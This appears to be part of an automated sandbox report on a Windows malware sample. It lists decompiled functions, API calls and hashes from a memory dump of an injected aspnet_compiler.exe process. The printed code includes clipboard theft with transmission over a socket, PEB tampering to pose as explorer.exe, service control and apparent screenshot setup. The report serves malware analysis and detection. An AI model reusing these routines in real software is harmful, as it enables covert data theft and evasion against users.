								_t69 =  *(_t74 + 2) & 0x0000ffff;
								_a8 = _t69;
								if((_t63 & 0x00000008) == 0) {
									_t72 = 0;
									_t54 =  ==  ? _t72 : "udp";
									_t42 = _t69 & 0x0000ffff;
									__imp__#56(_t42,  ==  ? _t72 : "udp");
									if(_t42 == 0) {
										L17:
										_push(_v0);
										L18:
										__imp__#15();
										E0041391A( &_v20, 6, "%u", _t42 & 0x0000ffff);
										_t58 =  &_v20;
										_t77 = _t77 + 0x10;
										L19:
										if(_t76 <= E00439290(_t58)) {
											goto L42;
										}
										E0044030E(_a8, _t76, _v24);
										_t77 = _t77 + 0xc;
										_t71 = 2;
										goto L21;
									}
									_t42 =  *_t42;
									if(_t42 == 0) {
										goto L17;
									}
									_v20 = _t42;
									goto L19;
								}
								_push(_t69);
								goto L18;
							}
						}
						return 0x2726;
					}
				}
			}

























                    0x00413ef7
                    0x00413efa
                    0x00413f00
                    0x00413f04
                    0x00413f0c
                    0x00413f10
                    0x00413f19
                    0x00413f20
                    0x004140be
                    0x00000000
                    0x00413f31
                    0x00413f33
                    0x00413f37
                    0x00000000
                    0x00413f39
                    0x00413f48
                    0x00413f4c
                    0x00413f50
                    0x00413f54
                    0x00413f5c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413f6a
                    0x00413f6a
                    0x00413f6a
                    0x00413f70
                    0x00413f75
                    0x00413f83
                    0x00414013
                    0x00414018
                    0x004140b3
                    0x00000000
                    0x00414026
                    0x00414026
                    0x00414029
                    0x00414030
                    0x00414038
                    0x0041403d
                    0x00414045
                    0x00414065
                    0x00414068
                    0x0041408e
                    0x00414092
                    0x00414092
                    0x00414098
                    0x0041409a
                    0x004140a3
                    0x00000000
                    0x00000000
                    0x004140ab
                    0x00000000
                    0x004140b0
                    0x0041406a
                    0x00414075
                    0x00414077
                    0x00414083
                    0x00000000
                    0x00414083
                    0x00414079
                    0x0041407c
                    0x00000000
                    0x00414087
                    0x00414081
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414081
                    0x00414047
                    0x0041404b
                    0x00000000
                    0x00000000
                    0x00414050
                    0x00414055
                    0x0041405e
                    0x00414060
                    0x00414060
                    0x0041405e
                    0x00000000
                    0x00414050
                    0x00414032
                    0x00000000
                    0x00414032
                    0x00413f91
                    0x00413f91
                    0x00413f95
                    0x00413f9c
                    0x00413fa3
                    0x00413fac
                    0x00413fb0
                    0x00413fb4
                    0x00413fbc
                    0x00413fca
                    0x00413fca
                    0x00413fce
                    0x00413fce
                    0x00413fe4
                    0x00413fe9
                    0x00413fed
                    0x00413ff0
                    0x00413ff9
                    0x00000000
                    0x00000000
                    0x00414008
                    0x0041400d
                    0x00414012
                    0x00000000
                    0x00414012
                    0x00413fbe
                    0x00413fc2
                    0x00000000
                    0x00000000
                    0x00413fc4
                    0x00000000
                    0x00413fc4
                    0x00413f9e
                    0x00000000
                    0x00413f9e
                    0x00413f83
                    0x00000000
                    0x00413f77
                    0x00413f54

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
                    • API String ID: 0-1267037602
                    • Opcode ID: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                    • Instruction ID: dec2bdb26369982db7c5889bd327832f44181b2331e29388f4f60b1078a915a5
                    • Opcode Fuzzy Hash: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                    • Instruction Fuzzy Hash: A551E235649301ABE7209E26D904BA77BE4ABC8711F08082FFA4593390D67DCDC18A5F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0043913A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0043913A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E004390B7(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					E0043A5BB();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E00444A38(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E00444A38(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00446260(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0043EE77(GetLastError());
										}
									}
								}
								E00445002(_t67);
							} else {
								E0043EE77(GetLastError());
							}
						}
						E00445002(_t64);
					} else {
						E0043EE77(GetLastError());
					}
					goto L18;
				}
			}



















                    0x0043913a
                    0x0043914a
                    0x00439152
                    0x00439154
                    0x00439157
                    0x0043915a
                    0x0043915f
                    0x00439174
                    0x00439179
                    0x0043917f
                    0x00439251
                    0x00439255
                    0x0043925a
                    0x0043925a
                    0x00439268
                    0x00439268
                    0x00439161
                    0x00439166
                    0x00000000
                    0x00000000
                    0x00439168
                    0x0043916d
                    0x00000000
                    0x00439189
                    0x00439192
                    0x00439198
                    0x0043919d
                    0x004391ba
                    0x004391bc
                    0x004391bf
                    0x004391da
                    0x004391f3
                    0x004391f8
                    0x00439208
                    0x00439210
                    0x00439215
                    0x0043922e
                    0x0043923f
                    0x00439230
                    0x00439237
                    0x0043923c
                    0x0043922e
                    0x00439215
                    0x00439243
                    0x004391dc
                    0x004391e3
                    0x004391e3
                    0x00439248
                    0x0043924a
                    0x0043919f
                    0x004391a6
                    0x004391ab
                    0x00000000
                    0x0043919d

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439192
                    • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043919F
                    • __dosmaperr.LIBCMT ref: 004391A6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391D2
                    • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391DC
                    • __dosmaperr.LIBCMT ref: 004391E3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 00439226
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439230
                    • __dosmaperr.LIBCMT ref: 00439237
                    • _free.LIBCMT ref: 00439243
                    • _free.LIBCMT ref: 0043924A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: 36c92f70edf6872b9f14a0353817578da13524950d77874f46d04974b582e123
                    • Instruction ID: 02b817c51ddb1bfcd431cbf40756152772ff8ffa7747545afeb7dfc7970056dd
                    • Opcode Fuzzy Hash: 36c92f70edf6872b9f14a0353817578da13524950d77874f46d04974b582e123
                    • Instruction Fuzzy Hash: 5A31D37140460BBFEF116FA5DC45CAF3B68EF09325F1002AAF810662A1DB78CD10DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E00405480(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t126 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020D6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
				SetEvent( *(_t69 + 0x24));
				_t28 = E00401F8B( &_v108);
				E00404182( &_v108,  &_v60, 4, 0xffffffff);
				_t121 = (_t118 & 0xfffffff8) - 0x5c;
				E004020D6(_t69, _t121, _t101, _t126, 0x472ec8);
				_t122 = _t121 - 0x18;
				E004020D6(_t69, _t122, _t101, _t126,  &_v76);
				E0041A976( &_v140, _t101);
				_t123 = _t122 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00401E45( &_v116, _t101, _t117, __eflags, 0);
					_t36 = E0040245C();
					E00401F8B(E00401E45( &_v120, _t101, _t117, __eflags, 0));
					_t101 = _t36;
					_t113 = E00411235();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00401E6D( &_v116, _t101);
						E00401FB8();
						E00401FB8();
						__eflags = 0;
						return 0;
					}
					 *0x470af0 = E004114AA(_t113, "DisplayMessage");
					_t45 = E004114AA(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x470ae8 = _t45;
					_t46 = E004114AA(_t113, "CloseChat");
					_t124 = _t123 - 0x18;
					 *0x470aec = _t46;
					 *0x470ae5 = 1;
					E004020D6(_t69, _t124, "CloseChat", __eflags, 0x472f60);
					_push(0x74);
					E00404A81(_t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x470ae8(_t115,  &_v140);
					if(__eflags != 0) {
						_t124 = _t124 - 0x18;
						E00402097(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
						_push(0x3b);
						E00404A81(_t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t128 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x470af0(E00401F8B(E00401E45( &_v116, _t101, _t117, _t128, 0)));
				_t129 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040415E(_t69,  &_v80, _t101, _t117, 0x464070);
				_t101 =  &_v84;
				E0041A879(_t69, _t123 - 0x18,  &_v84);
				_push(0x3b);
				E00404A81(_t69,  &_v84, _t129);
				E00401EE9();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

































                    0x00405480
                    0x00405480
                    0x0040548e
                    0x00405497
                    0x0040549f
                    0x004054a9
                    0x004054bd
                    0x004054c2
                    0x004054cc
                    0x004054d1
                    0x004054db
                    0x004054e4
                    0x004054e9
                    0x004054ec
                    0x004054ef
                    0x0040559e
                    0x004055a5
                    0x004055b8
                    0x004055bd
                    0x004055c6
                    0x004055c8
                    0x004055ca
                    0x00405573
                    0x00405577
                    0x00405580
                    0x00405589
                    0x00405590
                    0x00405596
                    0x00405596
                    0x004055dd
                    0x004055e4
                    0x004055e9
                    0x004055ee
                    0x004055f5
                    0x004055fa
                    0x004055fd
                    0x00405604
                    0x00405610
                    0x00405615
                    0x00405619
                    0x0040561e
                    0x00405627
                    0x00405637
                    0x00405639
                    0x0040563b
                    0x00405645
                    0x0040564a
                    0x0040564e
                    0x00405659
                    0x00405659
                    0x00000000
                    0x00405639
                    0x004054f5
                    0x004054f8
                    0x00000000
                    0x00000000
                    0x0040550e
                    0x00405515
                    0x00405517
                    0x00000000
                    0x00000000
                    0x00405522
                    0x0040552a
                    0x00405530
                    0x00405535
                    0x00405539
                    0x00405542
                    0x00000000
                    0x00405547
                    0x0040555e
                    0x00405569
                    0x00405569
                    0x00405571
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040549F
                    • GetMessageA.USER32 ref: 0040554F
                    • TranslateMessage.USER32(?), ref: 0040555E
                    • DispatchMessageA.USER32 ref: 00405569
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00472F60), ref: 00405621
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: 2d00f7b2c1d5805ea62b1aa5cd655ac0b20f9e4c3bb4ed9f541ff053e451993d
                    • Instruction ID: ded252b4ff533e87208d36ac19c2d613ad87dfbb1ef060abaf95112ea2b93138
                    • Opcode Fuzzy Hash: 2d00f7b2c1d5805ea62b1aa5cd655ac0b20f9e4c3bb4ed9f541ff053e451993d
                    • Instruction Fuzzy Hash: 7B419271A043016BCA04FB75DC5A86F77A9EBC5714F40093EFA06A31E5DF398905CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406A20 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 99COMMON
                    Download Yara Rule
                    C-Code - Quality: 15%
                    			E00406A20(void* __edx, void* __esi, void* __ebp) {
				char _v4;
				signed int _v20;
				void* __ebx;
				void* __ecx;
				signed int _t19;
				void* _t40;
				void* _t48;
				intOrPtr _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				char* _t57;
				void* _t59;
				signed int _t65;

				_t56 = __ebp;
				_t53 = __esi;
				_t52 = _t48;
				if(_t52 != 0) {
					L3:
					 *0x470b04(_t53, _t56);
					_t54 = E004068CB();
					if(_t52 == 0) {
						_t49 =  *((intOrPtr*)(_t54 + 0x10));
						_t57 = L"explorer.exe";
						 *0x473968 =  *(_t49 + 0x3c);
						 *0x47396c =  *(_t49 + 0x44);
						_t19 =  *0x470b14; // 0x0
					} else {
						_t57 =  *0x47396c;
						_t19 =  *0x473968;
					}
					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x38, _t19);
					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x40, _t57);
					if(_t52 != 0) {
						_v20 = _v20 & 0x00000000;
						 *0x470b0c(GetCurrentProcess(), 0x470b14,  &_v20, 0x8000);
						 *0x470b14 =  *0x470b14 & 0x00000000;
						_t65 =  *0x470b14;
					}
					E00406874(_t65, "PEB: %x\n", _t54);
					E0040683F(_t65);
					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x3c)));
					E0040683F(_t65);
					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x44)));
					 *0x470b10();
					return  *0x470af8(0, E0040697D, _t52);
				}
				 *0x470b14 =  *0x470b14 & 0x00000000;
				_t1 =  &_v4; // 0x473220
				_v4 = 0x1000;
				_t40 =  *0x470b00(GetCurrentProcess(), 0x470b14, 0, _t1, 0x3000, 4);
				_t62 = _t40;
				if(_t40 < 0) {
					_push("[-] NtAllocateVirtualMemory Error\n");
					return E00406874(__eflags);
				}
				E0043E0D9( *0x470b14, E0043A99F(GetCurrentProcess, _t48, _t62, L"windir"));
				E0043E0FB( *0x470b14, L"\\explorer.exe");
				_push("[+] NtAllocateVirtualMemory Success\n");
				E00406874(_t62);
				_t59 = _t59 + 0x18;
				goto L3;
			}


















                    0x00406a20
                    0x00406a20
                    0x00406a29
                    0x00406a2d
                    0x00406a91
                    0x00406a93
                    0x00406a9e
                    0x00406aa2
                    0x00406ac1
                    0x00406ac4
                    0x00406acc
                    0x00406ad4
                    0x00406ad9
                    0x00406aa4
                    0x00406aa4
                    0x00406aaa
                    0x00406aaa
                    0x00406ae6
                    0x00406af4
                    0x00406afc
                    0x00406afe
                    0x00406b15
                    0x00406b1b
                    0x00406b1b
                    0x00406b1b
                    0x00406b28
                    0x00406b33
                    0x00406b3e
                    0x00406b49
                    0x00406b4f
                    0x00406b57
                    0x00000000
                    0x00406b6c
                    0x00406a2f
                    0x00406a36
                    0x00406a49
                    0x00406a54
                    0x00406a5a
                    0x00406a5c
                    0x00406ab1
                    0x00000000
                    0x00406abb
                    0x00406a6f
                    0x00406a7f
                    0x00406a84
                    0x00406a89
                    0x00406a8e
                    0x00000000

                    APIs
                    • GetCurrentProcess.KERNEL32(00470B14,00000000, 2GBm@,00003000,00000004,00000000,00000001), ref: 00406A51
                    • GetCurrentProcess.KERNEL32(00470B14,00000000,00008000,?,00000000,00000001,00000000,00406CCA,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406B12
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: 2GBm@$PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    • API String ID: 2050909247-2552087879
                    • Opcode ID: 2dbb473b084c92d41a398965754a8d860a590b788ad9187afee9f3367e6bbd1b
                    • Instruction ID: acb57f4be5314c8fdc403cfcc3c6874ba858f2dc6f38655895ae1e2efeca9399
                    • Opcode Fuzzy Hash: 2dbb473b084c92d41a398965754a8d860a590b788ad9187afee9f3367e6bbd1b
                    • Instruction Fuzzy Hash: EC31D8B2642300EBC710FFA5DC45F1677B8AB45349F11443AF506A6191DBB8E954CB2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00415881 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49clipboardCOMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E00415881(void* __ebp, void* _a8, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x46a8f0;
						E0040415E(_t23,  &_a28, _t34, __ebp,  !=  ? _t16 : 0x46a8f0);
						_t34 =  &_a24;
						E0041A879(_t23, _t41 - 0x18,  &_a24);
						_push(0x6b);
						E00404A81(0x4734e8,  &_a24, _t16);
						E00401EE9();
					}
				}
				E00401E6D( &_a16, _t34);
				E00401FB8();
				E00401FB8();
				return 0;
			}








                    0x0041588a
                    0x00415890
                    0x00415896
                    0x004158a5
                    0x004158b3
                    0x004158b6
                    0x004158bf
                    0x004158c5
                    0x004158d2
                    0x004158da
                    0x004158e2
                    0x004158e8
                    0x004158ed
                    0x004158f4
                    0x00415c96
                    0x00415c96
                    0x004158a5
                    0x0041611c
                    0x00416128
                    0x00416134
                    0x00416141

                    APIs
                    • OpenClipboard.USER32 ref: 00415882
                    • EmptyClipboard.USER32 ref: 00415890
                    • CloseClipboard.USER32 ref: 00415896
                    • OpenClipboard.USER32 ref: 0041589D
                    • GetClipboardData.USER32 ref: 004158AD
                    • GlobalLock.KERNEL32 ref: 004158B6
                    • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                    • CloseClipboard.USER32 ref: 004158C5
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: 4G
                    • API String ID: 2172192267-3080958808
                    • Opcode ID: f3e59b1ac7b06c90a28648a2ca30acba09b622406cd352ec576d636826a3b127
                    • Instruction ID: 4d86aa06e49f03239fcc2a4fb0273d51e2f014b5d08f715770ad07ab5d505bde
                    • Opcode Fuzzy Hash: f3e59b1ac7b06c90a28648a2ca30acba09b622406cd352ec576d636826a3b127
                    • Instruction Fuzzy Hash: 9D0121312083009BC314BF75EC596AE77A5BF90352F40493EFD06922A3DF38C946DA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419668 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00419668(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401EE4( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401EE9();
				return _t22;
			}








                    0x00419673
                    0x00419685
                    0x00419694
                    0x00419698
                    0x004196b2
                    0x004196c4
                    0x004196c9
                    0x004196cf
                    0x004196d8
                    0x004196e7
                    0x004196ec
                    0x004196ef
                    0x004196f2
                    0x004196b4
                    0x004196bb
                    0x004196be
                    0x004196c0
                    0x004196c0
                    0x0041969a
                    0x0041969b
                    0x0041969b
                    0x004196f7
                    0x00419704

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00418FE1,00000000), ref: 00419677
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00418FE1,00000000), ref: 0041968E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 0041969B
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00418FE1,00000000), ref: 004196AA
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: d85d181540acee76805cb3e11bb03bc958355361dea357d92f0995f51621def8
                    • Instruction ID: 3276af7575f15d8841acc4b0191f81aff6206dc885fe3b462974ed1c719105d3
                    • Opcode Fuzzy Hash: d85d181540acee76805cb3e11bb03bc958355361dea357d92f0995f51621def8
                    • Instruction Fuzzy Hash: 0B11E5319042187FD710AF64ECC9CFF3BACDB52BA6B000036F915921D1DB688D469AF9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004469A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004469A1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x45b2e0) {
					E00445002(_t52);
					_t26 = _a4;
				}
				E00445002( *((intOrPtr*)(_t26 + 0x3c)));
				E00445002( *((intOrPtr*)(_a4 + 0x30)));
				E00445002( *((intOrPtr*)(_a4 + 0x34)));
				E00445002( *((intOrPtr*)(_a4 + 0x38)));
				E00445002( *((intOrPtr*)(_a4 + 0x28)));
				E00445002( *((intOrPtr*)(_a4 + 0x2c)));
				E00445002( *((intOrPtr*)(_a4 + 0x40)));
				E00445002( *((intOrPtr*)(_a4 + 0x44)));
				E00445002( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00446867(5,  &_v8);
				_v8 =  &_a4;
				return E004468B7(4,  &_v8);
			}




                    0x004469a7
                    0x004469aa
                    0x004469b2
                    0x004469b5
                    0x004469ba
                    0x004469bd
                    0x004469c1
                    0x004469cc
                    0x004469d7
                    0x004469e2
                    0x004469ed
                    0x004469f8
                    0x00446a03
                    0x00446a0e
                    0x00446a1c
                    0x00446a24
                    0x00446a2d
                    0x00446a35
                    0x00446a49

                    APIs
                    • _free.LIBCMT ref: 004469B5
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 004469C1
                    • _free.LIBCMT ref: 004469CC
                    • _free.LIBCMT ref: 004469D7
                    • _free.LIBCMT ref: 004469E2
                    • _free.LIBCMT ref: 004469ED
                    • _free.LIBCMT ref: 004469F8
                    • _free.LIBCMT ref: 00446A03
                    • _free.LIBCMT ref: 00446A0E
                    • _free.LIBCMT ref: 00446A1C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                    • Instruction ID: 446d01ee53aad5418ccd4e85611433309046038f6e50f54d807d40262714f670
                    • Opcode Fuzzy Hash: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                    • Instruction Fuzzy Hash: F511B9B9100509BFEF01EF56D842CDD3B69FF04758B1140AAF9488F222D676DE509B85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00418B0F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00418B0F() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;

				E00456328(E00456753, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x470da4 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E004174ED(_t131);
					__imp__GdiplusStartup(0x470da4, _t131, 0);
				}
				_t150 =  *0x4726a8 - _t92;
				if( *0x4726a8 == _t92) {
					E00401EF3(0x473600, _t132, _t141, E00418023(_t146 - 0x40, _t132));
					E00401EE9();
				}
				_t42 = E00401F8B(E00401E45(0x473298, _t132, _t146, _t150, 0x19));
				_t45 = E00401EE4(E0041A7B9(_t146 - 0x58, E00401E45(0x473298, _t132, _t146, _t150, 0x1a)));
				_t134 =  *_t42;
				E00401EF3(0x473618,  *_t42, 0x473618, E0040CF38(_t146 - 0x40,  *_t42, _t45));
				E00401EE9();
				E00401EE9();
				CreateDirectoryW(E00401EE4(0x473618), _t92);
				E00401F66(_t92, _t146 - 0xb0);
				E00401F66(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x470d63 = 1;
